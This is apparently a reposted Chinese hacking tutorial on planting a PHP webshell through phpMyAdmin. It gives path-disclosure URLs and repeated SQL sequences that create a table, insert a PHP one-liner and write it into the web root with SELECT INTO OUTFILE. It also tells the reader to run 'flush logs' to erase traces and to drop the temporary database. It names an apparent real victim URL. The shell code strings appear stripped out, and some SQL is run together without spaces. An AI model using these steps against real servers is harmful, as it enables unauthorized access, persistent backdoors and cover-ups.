phpmyadmin 后台拿webshell

1:phpmyadmin 后台拿webshell

phpmyadmin爆路径方法weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php

http://url/phpmyadmin/libraries/select_lang.lib.php得到物理路径

D:\usr\www\html\phpMyAdmin\

----startcode---

CreateTABLEa(cmdtextNOTNULL);

InsertINTOa(cmd)VALUES('');

selectcmdfromaintooutfile'D:/usr/www/html/phpMyAdmin/d.php';

Drop TABLE IF EXISTS a;

Fatal error: Call to a member function getImgPath() on a non-object in D:\www\phpMyAdmin\themes\darkblue_orange\layout.inc.php on line 67

这里随便选择一个数据库我们这用MYSQL然后点SQL执行SQL语句

CreateTABLEa(cmdtextNOTNULL);这句是在MYSQL这个数据库中建一个a的表段

看到了吧a已经有了然后再执行

InsertINTOa(cmd)VALUES('');

意思你应该懂了吧就是把PHP一句话写到a这个表里

继续

selectcmdfromaintooutfile'D:/www/d.php';

这一句就是说把刚刚的那个a的表输出到网站的目录下的哪个文件里我们这里把刚暴出来的

路径写上   这里一定要注意 Windows里面的 / 这个斜刚 一定要注意 要把\ 这个斜刚换成/这个斜刚 不然PHP 不支持 就不会成功了

http://www.crystalnet.com.cn/d.php   ok了 连接我们的 PHP一句话

首先：

createdatabasejoyuan;/*建立数据库joyuan*/

usejoyuan;/*连接joyuan数据库*/

create table shell(code text); /* 建立表shell字段code文本型数据text */

然后：

insertintoshell(code)/*插入数据到shell表中的code字段*/

values('shell代码');/*值为shell代码我用PHP一句话，看后面*/

select*intooutfile'/home/www/htdocs/server.php'fromshell;

/*将shell表中的内容输出保存为文件(输出到web目录下，要不就无法访问shell了，可以直接输出到phpmyadmin目录下，不知道就phpinfo)*/

flush logs /* 删除日志 */

删掉刚建的joyuan数据库，直接删除或执行SQL命令：drop database joyuan;

利用PHP一句话客户端（http://linux.chaom.net/Shell.Htm）写自己的shell

PHP一句话的服务端地址就是：http://xxx/phpmyadmin/server.php

搞定，嘿嘿。

PHP一句话服务端代码：

========================================

Create TABLE a (cmd text NOT NULL);

InsertINTOa(cmd)VALUES('');

selectcmdfromaintooutfile'D:/phpMyAdmin/libraries/d.php';

Drop TABLE IF EXISTS a;

========================================

①建立数据库

create database hakz                        /*建立数据库hakz*/

use hakz                                          /*连接hakz数据库*/

create table shell(code text)           /*建立表shell，字段code为文本型数据*/       ②插入导出shell

insert into shell(code) values ('后门代码');       /*插入shell代码*/

select * into outfile '/home/www/website/…路径/shell.php' from shell;

                                                  /*导出shell到web路径下*/

flush logs                                       /*删除日志 这一点很重要哦*/        ③删除临时数据库

drop database hakz                   /*或者直接在phpmyadmin中进行可视化操作*/最后附上几种PHP一句话服务端代码：

                   /*容错代码*/

                  /*assert 函数和 eval一样*/

_______________________________________

本篇文章来源于Vip_威寶]|关注网络信息安全[http://www.weibao.tk/]

详细地址为:http://www.weibao.tk/article.asp?id=223